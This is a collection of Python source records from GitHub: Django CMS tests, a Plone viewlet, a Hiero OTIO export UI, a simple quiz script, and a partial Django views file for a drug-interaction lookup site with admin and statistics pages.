child_1.id,\n {'position': 'first-child', 'target': root_page.id})\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n\n # move page 2 into the first position\n response = c.post('/admin/basic_cms/page/%d/move-page/' % child_2.id,\n {'position': 'left', 'target': child_1.id})\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n\n # try to create a sibling with the same slug, via left, right\n from basic_cms import settings as pages_settings\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n page_data['target'] = child_2.id\n page_data['position'] = 'left'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n # try to create a sibling with the same slug, 
via first-child\n page_data['target'] = root_page.id\n page_data['position'] = 'first-child'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n # try to create a second page 2 in root\n del page_data['target']\n del page_data['position']\n\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n # cannot create because the slug already exists\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n # Now it should work because the page is not a sibling\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Page.objects.count(), 4)\n # Should not work because we already have a sibling at the same level\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n # try to change the page 2 slug into page 1\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/%d/' % child_2.id, page_data)\n self.assertEqual(response.status_code, 200)\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n response = c.post('/admin/basic_cms/page/%d/' % child_2.id, page_data)\n self.assertEqual(response.status_code, 200)\n\n def test_tree(self):\n \"\"\"\n Test that the navigation tree works properly with mptt.\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page1'\n c.post('/admin/basic_cms/page/add/', page_data)\n page_data['slug'] = 'page2'\n c.post('/admin/basic_cms/page/add/', page_data)\n page_data['slug'] = 'page3'\n c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p1 = Content.objects.get_content_slug_by_slug('page1').page\n p2 = Content.objects.get_content_slug_by_slug('page2').page\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n\n p2.move_to(p1, 'left')\n p2.save()\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p3.move_to(p2, 'left')\n p3.save()\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p1 = Content.objects.get_content_slug_by_slug('page1').page\n p2 = Content.objects.get_content_slug_by_slug('page2').page\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n\n p3.move_to(p1, 'first-child')\n p2.move_to(p1, 'first-child')\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[]\")\n\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n p3.move_to(p1, 'left')\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, ]\")\n\n def test_page_redirect_to_url(self):\n \"\"\"Test page redirected to an external URL.\"\"\"\n\n client = self.get_admin_client()\n\n page1 = self.create_new_page(client)\n url = 'http://code.google.com/p/django-page-cms/'\n page1.redirect_to_url = url\n page1.save()\n\n # now check whether we can retrieve the page.\n response = client.get(page1.get_url_path())\n self.assertTrue(response.status_code == 301)\n self.assertTrue(response['Location'] == url)\n\n def test_page_freeze_date(self):\n \"\"\"Test page freezing feature.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'before'\n page_data['slug'] = 'before'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = 
Page.objects.from_path('before', None)\n self.assertEqual(page.freeze_date, None)\n limit = datetime.datetime.now()\n page.freeze_date = limit\n page.save()\n\n page_data['title'] = 'after'\n page_data['slug'] = 'after'\n # this post erases the limit\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('after', None)\n page.freeze_date = limit\n self.assertEqual(page.slug(), 'before')\n page.freeze_date = None\n page.save()\n self.assertEqual(page.slug(), 'after')\n page.freeze_date = limit\n page.save()\n self.assertEqual(page.slug(), 'before')\n\n def test_delegate_to(self):\n \"\"\"Test the view delegate feature.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'delegate'\n page_data['slug'] = 'delegate'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('delegate', None)\n\n from basic_cms import urlconf_registry as reg\n reg.register_urlconf('test', 'basic_cms.testproj.documents.urls',\n label='test')\n page.delegate_to = 'test'\n page.save()\n\n response = c.get(self.get_page_url('delegate'))\n self.assertEqual(response.status_code, 200)\n\n from basic_cms.testproj.documents.models import Document\n doc = Document(title='doc title 1', text='text', page=page)\n doc.save()\n\n response = c.get(self.get_page_url('delegate/doc-%d' % doc.id))\n self.assertEqual(response.status_code, 200)\n\n self.assertContains(response, \"doc title 1\")\n reg.registry = []\n\n def test_untranslated(self):\n \"\"\"Test the untranslated feature in the admin.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'untranslated'\n page_data['slug'] = 'untranslated'\n untranslated_string = 'the untranslated string'\n page_data['untrans'] = untranslated_string\n page_data['template'] = 'pages/tests/untranslated.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('untranslated', None)\n self.assertEqual(\n Content.objects.get_content(page, 'en-us', 'untrans'),\n untranslated_string\n )\n\n page_data['untrans'] = ''\n response = c.get('/admin/basic_cms/page/%d/?language=fr-ch' % page.id)\n self.assertContains(response, untranslated_string)\n\n def test_root_page(self):\n \"\"\"Test that the root page doesn't trigger a 404.\"\"\"\n c = self.get_admin_client()\n self.new_page(content={'slug': 'this-is-not-a-404'})\n self.assertEqual(Page.objects.count(), 1)\n page = Page.objects.on_site()[0]\n self.assertTrue(page.is_first_root())\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 200)\n\n def test_page_with_trailing_slash(self):\n \"\"\"\n Test that a page is also available with and without a trailing slash.\n \"\"\"\n c = self.get_admin_client()\n self.new_page(content={'slug': 'root'})\n self.new_page(content={'slug': 'other'})\n response = c.get(self.get_page_url('other'))\n self.assertEqual(response.status_code, 200)\n response = c.get(self.get_page_url('other/'))\n self.assertEqual(response.status_code, 200)\n\n def test_page_sitemap(self):\n \"\"\"\n Test the sitemap class\n \"\"\"\n c = self.get_admin_client()\n page1 = self.new_page(content={'slug': 'english-slug'})\n page1.save()\n Content(page=page1, language='fr-ch', type='slug',\n body='french-slug').save()\n\n 
response = c.get('/sitemap.xml')\n\n self.assertContains(response, 'english-slug')\n self.assertNotContains(response, 'french-slug')\n\n response = c.get('/sitemap2.xml')\n\n self.assertContains(response, 'english-slug')\n self.assertContains(response, 'french-slug')\n","repo_name":"ArabellaTech/django-basic-cms","sub_path":"basic_cms/tests/test_functionnal.py","file_name":"test_functionnal.py","file_ext":"py","file_size_in_byte":32694,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
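The alias tests in the record above follow a reusable pattern; a minimal sketch of it outside the test suite (the `basic_cms.models` import path is an assumption — the file only shows `basic_cms.views` and `basic_cms.http` — and a page with slug 'home-page' is assumed to exist):

from basic_cms.models import Page, PageAlias  # import path assumed

page = Page.objects.from_path('home-page', None)
PageAlias(page=page, url='/index.php').save()
# A GET on /index.php now answers 301 to the page's canonical URL,
# which is exactly what test_page_alias asserts via assertRedirects(..., 301).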
+{"seq_id":"40832712114","text":"from Acquisition import aq_inner\nfrom AccessControl.SecurityManagement import getSecurityManager\n\nfrom plone.app.layout.viewlets import ViewletBase\n\nclass MultilingualContentViewlet(ViewletBase):\n\n def update(self):\n # We have to check the view permission on the translated object, because\n # getTranslations returns all objects, no matter the workflow state\n context = aq_inner(self.context)\n _checkPermission = getSecurityManager().checkPermission\n self.translations = []\n for lang, content in context.getTranslations(review_state=False).items():\n if _checkPermission('View', content):\n self.translations.append(content)\n","repo_name":"plone/Products.LinguaPlone","sub_path":"Products/LinguaPlone/browser/contentlinkviewlet.py","file_name":"contentlinkviewlet.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"27389445346","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Daniel Flehner Heen\"\n__credits__ = [\"Jakub Jezek\", \"Daniel Flehner Heen\"]\n\nimport hiero.ui\nfrom .OTIOExportTask import (\n OTIOExportTask,\n OTIOExportPreset\n)\n\ntry:\n # Hiero >= 11.x\n from PySide2 import QtCore\n from PySide2.QtWidgets import QCheckBox\n from hiero.ui.FnTaskUIFormLayout import TaskUIFormLayout as FormLayout\n\nexcept ImportError:\n # Hiero <= 10.x\n from PySide import QtCore # lint:ok\n from PySide.QtGui import QCheckBox, QFormLayout # lint:ok\n\n FormLayout = QFormLayout # lint:ok\n\nfrom openpype.hosts.hiero.api.otio import hiero_export\n\nclass OTIOExportUI(hiero.ui.TaskUIBase):\n def __init__(self, preset):\n \"\"\"Initialize\"\"\"\n hiero.ui.TaskUIBase.__init__(\n self,\n OTIOExportTask,\n preset,\n \"OTIO Exporter\"\n )\n\n def includeMarkersCheckboxChanged(self, state):\n # Slot to handle change of checkbox state\n hiero_export.include_tags = state == QtCore.Qt.Checked\n\n def populateUI(self, widget, exportTemplate):\n layout = widget.layout()\n formLayout = FormLayout()\n\n # Hiero ~= 10.0v4\n if layout is None:\n layout = formLayout\n widget.setLayout(layout)\n\n else:\n layout.addLayout(formLayout)\n\n # Checkboxes for whether the OTIO should contain markers or not\n self.includeMarkersCheckbox = QCheckBox()\n self.includeMarkersCheckbox.setToolTip(\n \"Enable to include Tags as markers in the exported OTIO file.\"\n )\n self.includeMarkersCheckbox.setCheckState(QtCore.Qt.Unchecked)\n\n if self._preset.properties()[\"includeTags\"]:\n self.includeMarkersCheckbox.setCheckState(QtCore.Qt.Checked)\n\n self.includeMarkersCheckbox.stateChanged.connect(\n self.includeMarkersCheckboxChanged\n )\n\n # Add Checkbox to layout\n formLayout.addRow(\"Include Tags:\", self.includeMarkersCheckbox)\n\n\nhiero.ui.taskUIRegistry.registerTaskUI(\n OTIOExportPreset,\n OTIOExportUI\n)\n","repo_name":"ynput/OpenPype","sub_path":"openpype/hosts/hiero/api/startup/Python/Startup/otioexporter/OTIOExportUI.py","file_name":"OTIOExportUI.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"91"}
+{"seq_id":"7117828613","text":"import random\n\nmatematika = [(\"mtk soal 1\",\"mtk jwbn1\"),\n (\"mtk soal 2\",\"mtk jwbn2\"),\n (\"mtk soal 3\",\"mtk jwbn3\"),\n (\"mtk soal 4\",\"mtk jwbn4\"),\n (\"mtk soal 5\",\"mtk jwbn5\"),\n ]\nfisika = [(\"fsk soal 1\",\"fsk jwbn1\"),\n (\"fsk soal 2\",\"fsk jwbn2\"),\n (\"fsk soal 3\",\"fsk jwbn3\"),\n (\"fsk soal 4\",\"fsk jwbn4\"),\n (\"fsk soal 5\",\"fsk jwbn5\"),\n ]\nkimia = [(\"kma soal 1\",\"kma jwbn1\"),\n (\"kma soal 2\",\"kma jwbn2\"),\n (\"kma soal 3\",\"kma jwbn3\"),\n (\"kma soal 4\",\"kma jwbn4\"),\n (\"kma soal 5\",\"kma jwbn5\"),\n ]\nbiologi = [(\"blg soal 1\",\"blg jwbn1\"),\n (\"blg soal 2\",\"blg jwbn2\"),\n (\"blg soal 3\",\"blg jwbn3\"),\n (\"blg soal 4\",\"blg jwbn4\"),\n (\"blg soal 5\",\"blg jwbn5\"),\n ]\n\n\ndef main():\n while True :\n print(\"\\nPilih Mapel:\")\n print(\"1. Matematika\")\n print(\"2. Fisika\")\n print(\"3. Kimia\")\n print(\"4. Biologi\")\n print(\"5. Udahan\")\n choice = input(\"Pilih MaPel: \")\n\n if choice == '1':\n soal_mtk, answer = random.choice(matematika)\n print(\"Jawablah soal ini: \")\n print(soal_mtk)\n answer_user = input(\"Jawaban: \")\n\n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else :\n print(\"Jawaban anda salah\")\n continue\n \n lanjut = input(\"CODE OTP: \")\n if lanjut.lower() == 'otp':\n break\n\n elif choice == '2':\n soal_fsk, answer = random.choice(fisika)\n print(\"Jawablah soal ini: \")\n print(soal_fsk)\n answer_user = input(\"Jawaban: \")\n \n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '3':\n soal_kma, answer = random.choice(kimia)\n print(\"Jawablah soal ini: \")\n print(soal_kma)\n answer_user = input(\"Jawaban: \")\n \n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '4':\n soal_blg, answer = random.choice(biologi)\n print(\"Jawablah soal ini: \")\n print(soal_blg)\n answer_user = input(\"Jawaban: \")\n\n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '5':\n print(\"Jangan lupa banyak berlatih ya...\")\n break\n\n else:\n print(\"salah pilihan\")\n\nif \"_main_\":\n main()","repo_name":"RapliiMZ/Project-Python","sub_path":"src/soal.py","file_name":"soal.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34680905462","text":"from django.shortcuts import render, redirect\nfrom django.db import connection\nfrom django.contrib import messages\nfrom django import forms\nfrom django.contrib.auth.hashers import make_password, check_password\n\n## Functions used in the rest of the views\n\n# This function takes a drug in parameter and checks if this drug exists in the database,\n# it returns True or False, if True is returned, it means that the drug exists, if False is\n# returned, the drug doesn't exist. \ndef CheckExistingDrug(drug):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM drug WHERE name=%s\",([drug]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# This function takes a substance in parameter and checks if this substance exists in the database,\n# it returns True or False, if True is returned, it means that the substance exists, if False is\n# returned, the substance doesn't exist. \ndef CheckExistingSubstance(substance):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM substance WHERE name=%s\",([substance]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Same with accession number\ndef CheckExistingAccNum(acc_nb):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM substance WHERE accession_num=%s\",([acc_nb]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Same with food interaction\ndef CheckExistingFoodInteraction(substance, food):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM food_interactions WHERE subst_name=%s and food=%s\",([substance],[food]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Checks if the username and password that are in the parameters correspond to an existing administrator\n# it returns True if the username exists and the password corresponds, but returns false if the\n# username doesn't exist or if the password doesn't correspond\ndef CheckAdmin(username, password):\n\tcur=connection.cursor()\n\tusr=username.split()\n\tpwd=password.split()\n\tcur.execute(\"SELECT * FROM administrator WHERE name=%s\",(usr))\n\tr=cur.fetchall()\n\tif not r:\n\t\treturn False\n\telse:\n\t\tif check_password(pwd[0],r[0][1])==True:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\ndef home(request):\n\t# Start by creating a list of all the drugs that there are in the database for the dropdown list\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT name FROM drug\")\n\tr=cur.fetchall()\n\t# We fetch the first item of each row (the name of the drug)\n\tndrugs=[row[0] for row in r]\n\tlistD=[]\n\tlistDbis=[]\n\tlistS=[]\n\tlistI=[]\n\t# For each form input (drug 1 to drug 5) we fetch what is in it and put it in listD\n\tfor i in range(6):\n\t\tif request.POST.get(f'drug{i}')!=None:\n\t\t\tlistD.append(request.POST.get(f'drug{i}'))\n\t# For each drug in list D we select the corresponding substance and add it in listS and we also populate the listDbis\n\t# so that we have the drug (here 'i') and its substance (here row[0)\n\tfor i in listD:\n\t\tcur.execute(\"SELECT subst_name FROM drug WHERE name=%s\",([i]))\n\t\tr=cur.fetchall()\n\t\tfor row in r:\n\t\t\tlistS.append(row[0])\n\t\t\tlistDbis.append([i,row[0]])\n\t# We start by selecting each interaction in the database and then for each line of the SQL query, 
we check if the\n\t# substances we have in our listS are present in the interaction list. In other words, if one of our substances is\n\t# in position 1 or 2 of a row and another substance of our list is in the corresponding other position, we have\n\t# an interaction\n\t# We add only the matching interactions to the list called listI\n\tcur.execute(\"SELECT * FROM interactions ORDER BY level DESC\")\n\tr=cur.fetchall()\n\tfor row in r:\n\t\tli=list(row[0:])\n\t\tif li[1] in listS and li[2] in listS:\n\t\t\t# Each row of this list contains 'subst_a', 'subst_b', 'description' and 'level'\n\t\t\tlistI.append(li)\n\tcontext={\"nd\":ndrugs, 'listI':listI, 'listDbis':listDbis}\n\t\n\t#Insert the statistics into the statistics table\n\tfor i in range(len(listDbis)):\n\t\tinpage=\"\"\n\t\tinpgender=\"\"\n\t\tinpcontinent=\"\"\n\t\tinpdrug=\"\"\n\t\tsubst=\"\"\n\t\tif request.POST.get(\"age\")!=None and request.POST.get(\"gender\")!=None and request.POST.get(\"continent\")!=None:\n\t\t\tinpdrug=listD[i]\n\t\t\tsubst=listS[i]\n\t\t\tinpage=request.POST.get(\"age\")\n\t\t\tinpgender=request.POST.get(\"gender\")\n\t\t\tinpcontinent=request.POST.get(\"continent\")\n\t\t\tcur.execute('INSERT INTO statistics(id, drug, substance, age, gender, continent) VALUES(DEFAULT, %s, %s, %s, %s, %s)', ([inpdrug], [subst], [inpage], [inpgender], [inpcontinent]))\n\t\n\treturn render(request, 'DrugiComp/home.html', context)\n\ndef about(request):\n\treturn render(request, 'DrugiComp/about.html', {'title':'About'})\n\ndef statistics(request):\n\t# Data for chart 1\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT drug, COUNT(*) FROM statistics GROUP BY drug ORDER BY COUNT(*) DESC\")\n\tdrugs=cur.fetchall()\n\tdrugnames=[]\n\tdrugcount=[]\n\tfor i in drugs:\n\t\tdrugnames.append(i[0])\n\t\tdrugcount.append(i[1])\n\n\t# Data for chart 2\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT substance, COUNT(*) FROM statistics GROUP BY substance ORDER BY COUNT(*) DESC\")\n\tsubstances=cur.fetchall()\n\tsubstnames=[]\n\tsubstcount=[]\n\tfor i in substances:\n\t\tsubstnames.append(i[0])\n\t\tsubstcount.append(i[1])\n\n\t# Data for chart 3\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT continent, COUNT(*) FROM statistics WHERE NOT continent='' GROUP BY continent ORDER BY COUNT(*) DESC\")\n\tcontinents=cur.fetchall()\n\tcontnames=[]\n\tcontcount=[]\n\tfor i in continents:\n\t\tcontnames.append(i[0])\n\t\tcontcount.append(i[1])\n\n\t# Data for chart 4\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Male' AND age!='' GROUP BY age ORDER BY COUNT(*) DESC\")\n\tmeninfo=cur.fetchall()\n\tmenages=[]\n\tmenagecount=[]\n\tfor i in meninfo:\n\t\tmenages.append(i[0])\n\t\tmenagecount.append(i[1])\n\n\t# Data for chart 5\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Female' AND age!='' GROUP BY age ORDER BY COUNT(*) DESC\")\n\twomeninfo=cur.fetchall()\n\twomenages=[]\n\twomenagecount=[]\n\tfor i in womeninfo:\n\t\twomenages.append(i[0])\n\t\twomenagecount.append(i[1])\n\n\t# Data for chart 6\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Other / Do not want to state' AND age!='' GROUP BY age ORDER BY COUNT(*) DESC\")\n\totherinfo=cur.fetchall()\n\totherages=[]\n\tothercount=[]\n\tfor i in otherinfo:\n\t\totherages.append(i[0])\n\t\tothercount.append(i[1])\n\n\t# Data for chart 7\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT gender, COUNT(*) FROM statistics WHERE NOT gender='' 
GROUP BY gender ORDER BY COUNT(*) DESC\")\n\tgenderinfo=cur.fetchall()\n\tgendernames=[]\n\tgendercount=[]\n\tfor i in genderinfo:\n\t\tgendernames.append(i[0])\n\t\tgendercount.append(i[1])\n\n\treturn render(request, \"DrugiComp/statistics.html\", {'title':'Statistics', 'labels1':drugnames, 'data1':drugcount, 'labels2':substnames,\n\t\t'data2':substcount, 'labels3':contnames, 'data3':contcount, 'labels4':menages, 'data4':menagecount, 'labels5':womenages, \n\t\t'data5':womenagecount, 'labels6':otherages, 'data6':othercount, 'labels7':gendernames, 'data7':gendercount})\n\ndef test(request):\n\t# We select every drug in the database for the dropdown list in the input\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT name FROM drug\")\n\tndrugs=cur.fetchall()\n\tinpdrug=\"\"\n\tsubst=\"\"\n\tacc_nb=\"\"\n\tld=[]\n\tdrugsint=[]\n\t# If the input field is filled, i.e. a drug has been requested, we put it in the inpdrug variable\n\tif request.POST.get(\"drug\")!=None:\n\t\tinpdrug=request.POST.get(\"drug\")\n\t# For the drug that is in inpdrug, we fetch its substance's name and the accession number of this substance\n\tcur.execute(\"\"\"SELECT d.subst_name, s.accession_num \n\t\t\t\t\tFROM drug d JOIN substance s ON d.subst_name=s.name \n\t\t\t\t\tWHERE d.name=%s\"\"\",([inpdrug]))\n\tr=cur.fetchall()\n\t# subst contains the substance name of the drug and acc_nb the accession number of this drug's substance\n\tfor row in r:\n\t\tsubst=row[0]\n\t\tacc_nb=row[1]\n\t# Now we look for every interaction where the drug substance we have is in either 'subst_a' or 'subst_b'\n\tcur.execute(\"\"\"SELECT * FROM interactions \n\t\t\t\t\tWHERE subst_a=%s OR subst_b=%s\"\"\",([subst],[subst]))\n\tr=cur.fetchall()\n\t# For each interaction that was selected:\n\tfor row in r:\n\t\t# If the 'subst_a' attribute corresponds to our substance, we select every drug that contains this substance\n\t\t# and put it in the ld list\n\t\tif row[1]==subst:\n\t\t\tcur.execute(\"SELECT name FROM drug WHERE subst_name=%s\", ([row[2]]))\n\t\t\tres=cur.fetchall()\n\t\t\tfor i in res:\n\t\t\t\tld.append(i[0])\n\t\t# If the 'subst_b' attribute corresponds to our substance, we select every drug that contains this substance\n\t\t# and put it in the ld list\n\t\tif row[2]==subst:\n\t\t\tcur.execute(\"SELECT name FROM drug WHERE subst_name=%s\", ([row[1]]))\n\t\t\tres=cur.fetchall()\n\t\t\tfor i in res:\n\t\t\t\tld.append(i[0])\n\tcontext={'title':'Finder', 'ldrugs':ndrugs, \n\t'drug':inpdrug, 'drugsint':drugsint, 'subst':subst, 'acc_nb':acc_nb, 'ld':ld}\n\t\n\t#Insert the statistics into the statistics table\n\tinpage=\"\"\n\tinpgender=\"\"\n\tinpcontinent=\"\"\n\tif request.POST.get(\"age\")!=None and request.POST.get(\"gender\")!=None and request.POST.get(\"continent\")!=None:\n\t\tinpage=request.POST.get(\"age\")\n\t\tinpgender=request.POST.get(\"gender\")\n\t\tinpcontinent=request.POST.get(\"continent\")\n\t\tcur.execute('INSERT INTO statistics(id, drug, substance, age, gender, continent) VALUES(DEFAULT, %s, %s, %s, %s, %s)', ([inpdrug], [subst], [inpage], [inpgender], [inpcontinent]))\n\t\n\treturn render(request, 'DrugiComp/test.html', context)\n\nclass FormLogin(forms.Form):\n\tusername=forms.CharField(label=(\"Admin name\"), required=True, widget=forms.TextInput(attrs={'class':'form_text'}))\n\tpassword=forms.CharField(label=(\"Password\"), widget=forms.PasswordInput(attrs={'class':'form_text'}), required=True)\n\ndef admin_login(request):\n\tusername=None\n\tform_login=FormLogin()\n\tif request.method=='GET':\n\t\tif 
'action' in request.GET:\n\t\t\taction=request.GET.get('action')\n\t\t\tif action=='logout':\n\t\t\t\tif 'username' in request.session:\n\t\t\t\t\trequest.session.flush()\n\t\t\t\treturn redirect('DrugiComp-admin_login')\n\t\tif 'username' in request.session:\n\t\t\tusername=request.session['username']\n\telif request.method=='POST':\n\t\tform_login=FormLogin(request.POST)\n\t\tif form_login.is_valid():\n\t\t\tusername=form_login.cleaned_data['username']\n\t\t\tpassword=form_login.cleaned_data['password']\n\t\t\tif CheckAdmin(username, password)==True:\n\t\t\t\trequest.session['username']=username\n\t\t\t\trequest.session.set_expiry(900)\n\t\t\telse:\n\t\t\t\tusername=None\n\tcontext={'title':'Administrator Login', 'username':username, 'form':form_login}\n\treturn render(request, 'DrugiComp/admin_login.html', context)\n\ndef admin_page(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tcontext={'title':'Administrator Page', 'session':session}\n\t\treturn render(request, 'DrugiComp/admin_page.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef add_ds(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tdrug=request.POST.get(\"drug_name\")\n\t\tsubstance=request.POST.get(\"substance_name\")\n\t\taccession_number=request.POST.get(\"accession_number\")\n\t\trecommendation=request.POST.get(\"recommendation\")\n\t\tsubst_int=request.POST.getlist('substances')\n\t\tmessage=\"\"\n\t\tls=[]\n\t\texist_d=CheckExistingDrug(drug)\n\t\texist_s=CheckExistingSubstance(substance)\n\t\texist_an=CheckExistingAccNum(accession_number)\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"\"\"SELECT name FROM substance\"\"\")\n\t\tres=cur.fetchall()\n\t\tfor r in res:\n\t\t\tls.append(r)\n\t\tif request.POST.get(\"next_page\"):\n\t\t\tcur=connection.cursor()\n\t\t\tlist_interactions=[]\n\t\t\tif accession_number:\n\t\t\t\tcur.execute(\"\"\"INSERT INTO substance VALUES (%s, %s, %s)\"\"\", ([accession_number],[substance],[recommendation]))\n\t\t\t\tcur.execute(\"\"\"INSERT INTO drug VALUES (%s, %s)\"\"\", ([drug],[substance]))\n\t\t\t\tif subst_int:\n\t\t\t\t\tfor row in subst_int:\n\t\t\t\t\t\tdescription=None\n\t\t\t\t\t\tcur.execute(\"\"\"SELECT max(int_id) FROM interactions;\"\"\")\n\t\t\t\t\t\tif request.POST.get(\"description\"+row)!=\"\":\n\t\t\t\t\t\t\tdescription=request.POST.get(\"description\"+row)\n\t\t\t\t\t\tlevel=request.POST.get(\"level\"+row)\n\t\t\t\t\t\tr=cur.fetchall()\n\t\t\t\t\t\tfor i in r:\n\t\t\t\t\t\t\tmax_id=i[0]\n\t\t\t\t\t\tlist_interactions.append([substance, row, description, level])\n\t\t\t\t\t\tcur.execute(\"\"\"INSERT INTO interactions \n\t\t\t\t\t\t\tVALUES (%s,%s, %s, %s, %s)\"\"\", ([max_id+1],[substance],[row],[description],[level]))\n\t\t\telse:\n\t\t\t\tcur.execute(\"INSERT INTO drug VALUES (%s, %s)\", ([drug],[substance]))\n\t\t\tcontext={'drug':drug, 'substance':substance, 'accession_number':accession_number, \n\t\t\t\t\t'recommendation':recommendation, 'list_interactions':list_interactions}\n\t\t\tmessages.success(request, f'You added a drug to the database!')\n\t\t\treturn render(request, 'DrugiComp/summary_add.html', context)\n\t\tcontext={'drug':drug, 'substance':substance, 'exist_d':exist_d, 'exist_s':exist_s, \n\t\t\t\t\t'exist_an':exist_an, 'ls':ls, 'accession_number':accession_number, \n\t\t\t\t\t'recommendation':recommendation, 'subst_int':subst_int, 'session':session}\n\t\treturn render(request, 
'DrugiComp/add_ds.html', context)\n\tif session==None:\n\t\tcontext={'title':'Error', 'session':session}\n\t\treturn render(request, 'DrugiComp/error.html', context)\n\ndef remove_dsi(request):\n\tsession=request.session.get('username')\n\tif session!=None:\n\t\tobj=request.POST.get(\"object\")\n\t\tcur=connection.cursor()\n\t\tcur.execute(\"SELECT * FROM drug ORDER BY name\")\n\t\td_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM substance ORDER BY name\")\n\t\ts_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM interactions ORDER BY subst_a, subst_b\")\n\t\ti_res=cur.fetchall()\n\t\tcur.execute(\"SELECT * FROM food_interactions ORDER BY subst_name, food\")\n\t\tf_res=cur.fetchall()\n\t\tlistD=request.POST.getlist(\"drugs\")\n\t\tlistS=request.POST.getlist(\"substances\")\n\t\tlistI=request.POST.getlist(\"interactions\")\n\t\tlistI=list(map(int, listI))\n\t\tlistF=request.POST.getlist(\"food_interactions\")\n\t\tlistF=list(map(int, listF))\n\t\tlistIbis=[]\n\t\tlistFbis=[]\n\t\tfor i in listI:\n\t\t\tcur.execute(\"\"\"SELECT subst_a,subst_b FROM interactions WHERE int_id=%s\"\"\", 